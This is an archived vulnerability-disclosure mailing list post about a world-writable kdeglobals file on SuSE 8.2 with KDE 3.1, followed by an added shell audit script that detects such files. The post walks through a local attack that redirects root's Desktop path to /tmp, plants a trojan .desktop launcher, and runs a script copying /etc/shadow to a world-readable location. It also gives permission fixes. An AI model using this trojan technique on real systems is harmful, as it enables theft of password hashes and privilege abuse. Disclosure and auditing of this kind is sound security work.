Vulnerability Development mailing list archives

KDE 3.1 - Suse 8.2 - kdeglobals world writable


From: Martin Fallon <mar_fallon () yahoo com br>
Date: Fri, 14 Nov 2003 13:33:25 -0300 (ART)

Hi, Mrs.!

I have found one problem in SuSE 8.2 with KDE 3.1
(default installation in Brazilian version). The
configuration file "kdeglobals" in
/etc/opt/kde3/share/config is world writable.

An attacker can exploit this vulnerability
in many ways.

One basic example of attack is:

I - Overwrite the kdeglobals file with the contents
below:


#
# written by SuSEconfig.kde
#
[Locale]
Country=pt
Language=pt:BR


#Already altered below.

[Paths]
Desktop=/tmp/Desktop

II - Create the folder /tmp/Desktop and a trojan
horse in some .desktop file inside it. Example:

glaudson@suse:/tmp/Desktop> cat xpdf.desktop
[Desktop Entry]
Exec=/tmp/AutoStart/teste.sh
Icon=gv
TerminalOptions=
Path=
Type=Application
Terminal=0
X-KDE-StartupNotify=false
glaudson@suse:/tmp/Desktop>

III - Create the file to execute, /tmp/AutoStart/teste.sh,
with backdoor/trojan/spyware/malware code. Example:

glaudson@suse:/tmp/Desktop> cat ../AutoStart/teste.sh
#!/bin/bash
cp /etc/shadow /tmp/shadow
chmod 0777 /tmp/shadow


The icon "xpdf" will appear on root's desktop.
If root runs the icon, he runs the trojan horse and
the attack will have succeeded.

There are many other ways to exploit this bug.

Solution: 

chmod 0500 /etc/opt/kde3/share/config/kdeglobals
or 
rm -rf /etc/opt/kde3/share/config/kdeglobals

There are also other world-writable files
in SuSE 8.2 (Brazilian version):

glaudson@suse:/tmp/Desktop> find /etc/opt -perm -2 ! \( -type l -o -type c -o -type s -o -perm -1000 \)
/etc/opt/kde3/share/config/kmailrc
/etc/opt/kde3/share/config/kioslaverc
/etc/opt/kde3/share/config/kdeglobals.SuSEconfig
/etc/opt/kde3/share/config/kdeglobals
find: /etc/opt/kde3/share/servicetypes: Permissão negada


glaudson@suse:/tmp/Desktop> cat /etc/SuSE-release
SuSE Linux 8.2 (i586)
VERSION = 8.2
glaudson@suse:/tmp/Desktop> cat /proc/version
Linux version 2.4.20-4GB-athlon (root () Athlon suse de)
(gcc version 3.3 20030226 (prerelease) (SuSE Linux))
#1 Mon Mar 17 17:56:47 UTC 2003


Best Regards,

Martin Fallon.
Mercenarie's Club
http://cdm.frontthescene.com.br/
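
An audit sketch for the condition reported above, added here as an example and not part of the original post: it repeats the post's find predicate over a config tree and also flags [Paths] entries in a kdeglobals-style file that resolve through a world-writable directory. The function names, the --demo switch and the demo tree are assumptions made for illustration.

```shell
#!/bin/sh
# Added audit example, not from the original post.

# Same predicate as the find in the post: entries writable by "other",
# skipping symlinks, char devices, sockets and sticky-bit entries.
list_world_writable() {
    find "$1" -perm -2 ! \( -type l -o -type c -o -type s -o -perm -1000 \) 2>/dev/null
}

# Print every absolute [Paths] entry of a kdeglobals-style file that has a
# world-writable directory anywhere on its path. Sticky directories such as
# /tmp count too, since any user can still create entries inside them.
risky_paths() {
    awk '/^\[/ { in_paths = ($0 == "[Paths]"); next }
         in_paths && /^[^#][^=]*=\// { print }' "$1" |
    while IFS='=' read -r key value; do
        dir=$value
        while :; do
            if [ -d "$dir" ] && [ -n "$(find "$dir" -prune -perm -2 2>/dev/null)" ]; then
                echo "$key=$value"
                break
            fi
            [ "$dir" = "/" ] && break
            dir=$(dirname "$dir")
        done
    done
}

# Constructed demo tree (hypothetical file contents), built in a temp dir.
demo() {
    d=$(mktemp -d) && mkdir "$d/cfg" "$d/drop" && chmod 0755 "$d/cfg" && chmod 0777 "$d/drop"
    printf '[Locale]\nCountry=pt\n[Paths]\nDesktop=%s/drop/Desktop\nTrash=/usr/no-such-dir\n' "$d" > "$d/cfg/kdeglobals"
    : > "$d/cfg/kmailrc"
    chmod 0666 "$d/cfg/kdeglobals"; chmod 0644 "$d/cfg/kmailrc"
    echo "$d"
}

if [ "${1:-}" = "--demo" ]; then
    d=$(demo)
    list_world_writable "$d/cfg"
    risky_paths "$d/cfg/kdeglobals"
    rm -rf "$d"
fi
```

On a real system the two functions would be pointed at the system-wide config directory and its kdeglobals file; the second check catches a redirected Desktop path even after the file permissions have been corrected.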






